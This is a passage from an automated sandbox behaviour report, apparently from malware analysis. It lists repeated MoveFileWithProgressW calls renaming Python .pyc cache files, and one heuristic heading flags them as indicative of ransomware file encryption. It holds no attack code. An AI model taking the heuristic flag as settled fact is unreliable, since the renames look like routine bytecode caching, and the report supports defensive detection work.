MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc.8627744 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_sitebuiltins.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_sitebuiltins.cpython-37.pyc.8627744	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc.3325632 newfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\__init__.cpython-37.pyc.3325632	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc.3324864 newfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc.3324864	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\datetime.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\datetime.cpython-37.pyc.8596872 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\datetime.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\datetime.cpython-37.pyc.8596872	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc.8630928 newfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\__init__.cpython-37.pyc.8630928	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\operator.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\operator.cpython-37.pyc.9114336 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\operator.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\operator.cpython-37.pyc.9114336	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\keyword.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\keyword.cpython-37.pyc.8570976 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\keyword.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\keyword.cpython-37.pyc.8570976	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\heapq.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\heapq.cpython-37.pyc.8570976 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\heapq.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\heapq.cpython-37.pyc.8570976	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc.9083328 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\reprlib.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\reprlib.cpython-37.pyc.9083328	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc.8644416 newfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\abc.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\abc.cpython-37.pyc.8644416	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\__init__.cpython-37.pyc.8643840 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\__init__.cpython-37.pyc.8643840	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\decoder.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\decoder.cpython-37.pyc.8644608 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\decoder.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\decoder.cpython-37.pyc.8644608	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\re.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\re.cpython-37.pyc.8594848 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\re.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\re.cpython-37.pyc.8594848	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\enum.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\enum.cpython-37.pyc.9042896 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\enum.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\enum.cpython-37.pyc.9042896	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\types.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\types.cpython-37.pyc.8724512 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\types.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\types.cpython-37.pyc.8724512	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_compile.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_compile.cpython-37.pyc.8674048 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_compile.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_compile.cpython-37.pyc.8674048	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_parse.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_parse.cpython-37.pyc.8844088 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_parse.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_parse.cpython-37.pyc.8844088	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_constants.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\sre_constants.cpython-37.pyc.8674432 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_constants.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\sre_constants.cpython-37.pyc.8674432	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\functools.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\functools.cpython-37.pyc.8733408 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\functools.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\functools.cpython-37.pyc.8733408	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\copyreg.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\copyreg.cpython-37.pyc.8132264 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\copyreg.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\copyreg.cpython-37.pyc.8132264	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\scanner.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\scanner.cpython-37.pyc.8644800 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\scanner.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\scanner.cpython-37.pyc.8644800	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\encoder.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\encoder.cpython-37.pyc.8645472 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\encoder.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\encoder.cpython-37.pyc.8645472	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\base64.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\base64.cpython-37.pyc.9084384 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\base64.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\base64.cpython-37.pyc.9084384	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\struct.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\struct.cpython-37.pyc.8208280 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\struct.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\struct.cpython-37.pyc.8208280	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc.8127392 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\__pycache__\__init__.cpython-37.pyc.8127392	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc.8230096 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\__init__.cpython-37.pyc.8230096	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc.8230216 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Cipher\__pycache__\_mode_ecb.cpython-37.pyc.8230216	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc.8229736 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\__init__.cpython-37.pyc.8229736	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc.8231416 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_raw_api.cpython-37.pyc.8231416	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc.8229496 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\py3compat.cpython-37.pyc.8229496	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc.8231296 newfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\site-packages\Crypto\Util\__pycache__\_file_system.cpython-37.pyc.8231296	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\__init__.cpython-37.pyc.8188664 newfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\__init__.cpython-37.pyc.8188664	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\warnings.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\warnings.cpython-37.pyc.8295312 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\warnings.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\warnings.cpython-37.pyc.8295312	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\machinery.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\importlib\__pycache__\machinery.cpython-37.pyc.8189392 newfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\machinery.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\importlib\__pycache__\machinery.cpython-37.pyc.8189392	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\__init__.cpython-37.pyc.8644704 newfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\__init__.cpython-37.pyc.8644704	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\_endian.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\ctypes\__pycache__\_endian.cpython-37.pyc.8646240 newfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\_endian.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\ctypes\__pycache__\_endian.cpython-37.pyc.8646240	1	1

Appends a new file extension or content to 100 files indicative of a ransomware file encryption process (50 out of 100 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc.3426264 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\__init__.cpython-37.pyc.3426264	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\codecs.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\codecs.cpython-37.pyc.4121664 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\codecs.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\codecs.cpython-37.pyc.4121664	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc.3324768 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\aliases.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\aliases.cpython-37.pyc.3324768	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc.3325056 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\utf_8.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\utf_8.cpython-37.pyc.3325056	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc.3325440 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\latin_1.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\latin_1.cpython-37.pyc.3325440	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\io.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\io.cpython-37.pyc.4164120 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\io.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\io.cpython-37.pyc.4164120	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\abc.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\abc.cpython-37.pyc.8398944 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\abc.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\abc.cpython-37.pyc.8398944	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc.8626496 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\ascii.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\ascii.cpython-37.pyc.8626496	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\site.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\site.cpython-37.pyc.4144432 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\site.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\site.cpython-37.pyc.4144432	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\os.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\os.cpython-37.pyc.8487032 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\os.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\os.cpython-37.pyc.8487032	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\stat.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\stat.cpython-37.pyc.8527768 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\stat.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\stat.cpython-37.pyc.8527768	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\ntpath.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\ntpath.cpython-37.pyc.8520856 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc.8520856	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\genericpath.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\genericpath.cpython-37.pyc.8626784 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\genericpath.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\genericpath.cpython-37.pyc.8626784	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc.8627744 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc.8627744	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_sitebuiltins.cpython-37.pyc.8627744 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_sitebuiltins.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_sitebuiltins.cpython-37.pyc.8627744	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\__init__.cpython-37.pyc.3325632 newfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\__init__.cpython-37.pyc.3325632	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc.3324864 newfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\sqlite3\__pycache__\dbapi2.cpython-37.pyc.3324864	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\datetime.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\datetime.cpython-37.pyc.8596872 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\datetime.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\datetime.cpython-37.pyc.8596872	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\__init__.cpython-37.pyc.8630928 newfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\__init__.cpython-37.pyc.8630928	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\operator.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\operator.cpython-37.pyc.9114336 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\operator.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\operator.cpython-37.pyc.9114336	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\keyword.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\keyword.cpython-37.pyc.8570976 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\keyword.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\keyword.cpython-37.pyc.8570976	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\heapq.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\heapq.cpython-37.pyc.8570976 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\heapq.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\heapq.cpython-37.pyc.8570976	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\reprlib.cpython-37.pyc.9083328 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\reprlib.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\reprlib.cpython-37.pyc.9083328	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\collections\__pycache__\abc.cpython-37.pyc.8644416 newfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\abc.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\collections\__pycache__\abc.cpython-37.pyc.8644416	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\json\__pycache__\__init__.cpython-37.pyc.8643840 newfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\json\__pycache__\__init__.cpython-37.pyc.8643840	1	1
